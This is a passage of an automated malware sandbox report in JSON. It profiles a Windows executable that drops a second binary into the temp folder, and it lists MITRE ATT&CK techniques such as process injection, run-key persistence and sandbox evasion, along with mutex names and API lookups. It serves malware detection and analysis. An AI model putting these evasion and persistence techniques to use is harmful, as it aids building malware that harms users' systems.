"00000000-00005760", "name": "085cda53603755dc.exe", "normalized_path": "%TEMP%\\085cda53603755dc.exe", "command_line": "a ZZZZZZUSTZG", "sha256": "a0c96c1530c5ab5f22644d43278ee7bc60cc50f0b4091aee9988e5d943e4b9fa"}], "mitre_attcks": [{"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "suspicious_identifiers_count": 3, "informative_identifiers_count": 12}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "suspicious_identifiers_count": 2, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 3, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 1, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 2, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Safe Mode Boot", "attck_id": "T1562.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 13}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrug\"\n \"Global\\giojheiowrghtiovhjwiojrug\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrugzyb\"\n \"Global\\giojheiowrghtiovhjwiojrugzyb\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"085cda53603755dc.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"\n \"085cda53603755dc.exe\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005880)\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005880)\n \"a92c0f7c02884571e98efbc6a28dc5e8eb168738f7c5fe1a8af2ff0a0967f448.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00005880)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005760)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00005760)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00005760)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00005760)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00005760)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00005760)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005760)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00005760)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00005760)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00005760)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00005760)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00005760)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00005760)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00005760)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00005760)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00005760)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00005760)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00005760)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00005760)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00005860)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00005860)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"14001500da59e975@api-ms-win-downlevel-advapi32-l1-1-0.dll\"\n \"130014008e5ae975@api-ms-win-downlevel-advapi32-l1-1-0.dll\"\n \"15001600c03e0f6a@ADVAPI32.dll\"\n \"0e000f00703f0f6a@ADVAPI32.dll\"\n \"0e000f00cc3f0f6a@ADVAPI32.dll\"\n \"11001200b4470f6a@ADVAPI32.dll\"\n 